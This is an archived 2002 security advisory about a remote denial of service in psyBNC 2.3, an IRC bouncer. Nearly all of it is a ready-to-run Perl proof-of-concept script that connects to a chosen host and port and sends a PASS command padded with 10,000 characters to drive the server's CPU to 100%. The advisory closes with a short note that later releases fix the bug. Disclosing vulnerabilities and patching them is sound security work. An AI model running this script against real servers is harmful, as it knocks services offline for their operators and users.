26th Sep 2002 [SBWID-5306]
COMMAND
	PsyBNC Remote Dos
SYSTEMS AFFECTED
	Version 2.3
PROBLEM
	dvdman [http://www.l33tsecurity.com/] posted following proof of  concept
	regarding a remote DoS consuming 100% CPU.
	psyBNC is an easy-to-use, multi-user, permanent  IRC-Bouncer  with  many
	features. [http://www.psychoid.lam3rz.de/]
	 Proof Of Concept
	 ================
	
	#!/usr/bin/perl
	#PsyBNC 2.3 Remote DDOS POC
	#By DVDMAN ([email protected])
	#WWW.L33TSECURITY.COM
	#L33T SECURITY
	use Getopt::Std;
	use IO::Socket;
	$|=1;
	my %options;
	getopt('Hhp',\%options);
	$arg2 = shift(@ARGV);
	$options{h} && usage();
	if ($options{H})
	{
	do_psy();
	}
	if ($options{p})
	{
	do_psy();
	}
	else
	{
	usage();
	}
	sub usage()
	{
	    print("[L33TSECURITY]  PsyBNC 2.3 Remote DDOS\n");
	    print(" (C) DVDMAN \n\n");
	    print("Usage: $0 [options]\n");
	    print("-H = hostname or ip REQUIRED\n");
	    print("-p = port of PSYBNC server REQUIRED\n");
	}
	exit(1);
	sub do_psy() {
	my $test = $options{H};
	my $test2 = $options{p};
	    $remote = IO::Socket::INET->new(
	                        Proto     => "tcp",
	                                PeerAddr  => $test,
	                                PeerPort  => $test2,
	        );
	    unless ($remote) {
	           print"error cannot connect";
	           return
	        }
	    $remote->autoflush(1);
	print STDERR "PsyBNC REMOTE DDOS BY DVDMAN\n";
	print STDERR " starting attack in 5 seconds...\n";
	sleep(5);
	my $user = "USER OWNED OWNED OWNED OWNED OWNED\r\n";
	my $nick = "NICK OWNED\r\n";
	my $pw = "PASS " . "A"x10000;
	print $remote $user;
	print $remote $nick;
	print $remote $pw;
	print STDERR "DONE\n"; 
	die "BYE\n";
	}
	#By DVDMAN ([email protected])
	#WWW.L33TSECURITY.COM
	#L33T SECURITY
	
SOLUTION
	Fixed in current available 2.3 release,  and  in  current  beta  version
	(2.3.1).